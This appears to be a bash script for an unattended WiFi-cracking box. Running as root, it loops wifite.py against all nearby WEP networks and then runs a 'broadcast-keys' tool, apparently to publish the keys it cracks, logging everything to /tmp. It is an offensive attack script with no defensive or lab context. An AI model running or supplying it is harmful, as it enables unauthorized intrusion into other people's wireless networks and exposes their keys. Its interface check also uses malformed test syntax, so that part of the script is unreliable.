#!/bin/bash
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/root/bin
export HOME=/root
if [ ! ifconfig -a wlan0 >/dev/null ]
then
	echo 'wlan0 not found'
	exit 1
fi
cd $HOME
while true
do
	/root/bin/wifite.py --wep -1 --all --scan-time 60 --power 15 >>/tmp/wifite.log
	/root/kocrack/broadcast-keys >> /tmp/wifite.log
done
